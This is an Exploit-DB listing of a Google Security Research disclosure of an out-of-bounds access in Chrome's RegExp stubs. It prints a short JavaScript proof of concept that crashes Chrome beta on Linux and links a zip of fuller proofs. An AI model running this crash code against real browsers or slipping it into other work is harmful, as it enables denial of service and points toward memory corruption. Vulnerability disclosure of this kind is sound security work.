Google Chrome - Out-of-Bounds Access in RegExp Stubs

EDB-ID: 42286
Author: Google Security Research
Published: 2017-06-30
CVE: N/A
Type: Dos
Platform: Multiple
Aliases: N/A
Advisory/Source: Link
Tags: Out Of Bounds
Vulnerable App: N/A

  
A minimal PoC is as follows, and two full PoCs (one for test and one for exec) are attached.

var re;
function f(){
for(var i = 0; i < 100; i++){
re["test" + i] = 0x77777777; // make a dict
}
return 0;
}

re = /-/g;
var str = '2016-01-02';
re.lastIndex = {valueOf : f};
result = re.exec(str);

This PoC crashes on google-chrome-beta on Linux.


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42286.zip

Related Posts

Comments